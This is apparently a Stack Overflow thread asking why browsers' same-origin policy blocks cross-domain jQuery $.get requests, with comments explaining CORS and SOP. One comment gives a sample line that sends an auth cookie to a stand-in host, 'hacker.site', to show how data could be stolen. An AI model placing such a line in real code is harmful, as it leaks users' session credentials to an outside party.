# Why does Access-Control-Allow-Origin block $.get requests?

Tags: jquery, security, access-control

I understand the place that Access-Control-Allow-Origin has in web security and it is a very useful protocol, however, why does it block external usage of `$.get`?

The protocol is great for blocking `$.post` because I don't want anyone to be able to post variables to a page on my website when they shouldn't, but anyone can just type in the a URL like:

> http://www.example.com/index.php?somevar=1&anothervar=2

And my server will execute it just like it came directly from me. **There is no differentiation between this URL being linked on an external domain and an internal domain.**

So if this is publicly accessible, why is the equivalent blocked in jQuery?

```
$.get("http://www.example.com/index.php", {somevar: 1, anothervar: 2});
```

Comment: It is called [Same Origin Policy](http://en.wikipedia.org/wiki/Same-origin_policy)

Comment: `Access-Control-Allow-Origin` is _not_ about blocking any incoming requests to your server, it is about telling the client whether or not a script should be allowed to make a call to another domain. (And as such it doesn’t protect your server from any arbitrary POST requests either, so please don’t make the mistake of thinking that you secure when it comes to that.)

Comment: It's a restriction of Ajax in general, it doesn't depend on the method you use. It's not to prevent *people* to make requests to your server (after all, it's trivial to write e.g. a Python script that makes a POST request to your server), it's to prevent scripts in web browsers from doing that.

Comment: I understand that, but where is there an additional security risk in allowing $.get to access other domains?

Comment: @David: You can also send data via GET, so if this was allowed it would be easy to steal data from others. `$.get("http://hacker.site", {authCookie: 1});`. Of course in that case the attacker needs to find a way to inject the code in the webpage, which may not be straightforward, but is also a risk.

Comment: @FelixKling Ah I see what you mean.

Comment: If this was just about “stealing” that `authCookie` value, by passing it to `http://hacker.site` – that can be done in other ways that are not restricted by the SOP at all, once the JS code can be injected – it does __not__ protect against XSS and stealing of client-side data. The reason why `XMLHttpRequest`/AJAX is restricted that way however is because with those you could get response data _back_ from `http://external.site` to be used in your script. So CORS’ main purpose is to enable `external.site` to either deny (default) or explicitly allow that at _their_ choice.

Comment: @CBroe: You are right, there are other ways how you could steal the data. Your explanation makes sense, however, I guess the follow up question is: *Why* does  `XMLHttpRequest` have to be restricted like that in the first place? What makes it different from, say, an HTTP request in a Python script? Would we actually want to be able to restrict any kind of access from scripts, but can't in case of "normal" HTTP?

Comment: _“What makes it different from, say, an HTTP request in a Python script?”_ – if I don’t want _just anyone_ to access my data via HTTP, but allow certain server-side scripts to do so – well, then I could protect them via HTTP Auth or a simple password or something. If I’d want that same restriction to apply to scripts on the client side – well, then I’d have to divulge that auth data to the client, and therefor it would be kinda useless, since everyone could see and steal it from there. So for client-side scripting, there are other measures.

Comment: And while these two scenarios are not completely comparable, the SOP at least prevents you from _using_ my data client-side at your own discretion, unless I specifically allow it. Yes, you could still get that unprotected data server-side and pass it to your client – but against that, I can take measures in a simpler way, f.e. by blocking your server’s IP if I see you hammering my server with requests over and over again. Can’t do that easily if you were to leech my data client-side, because it’ll be a different client each time.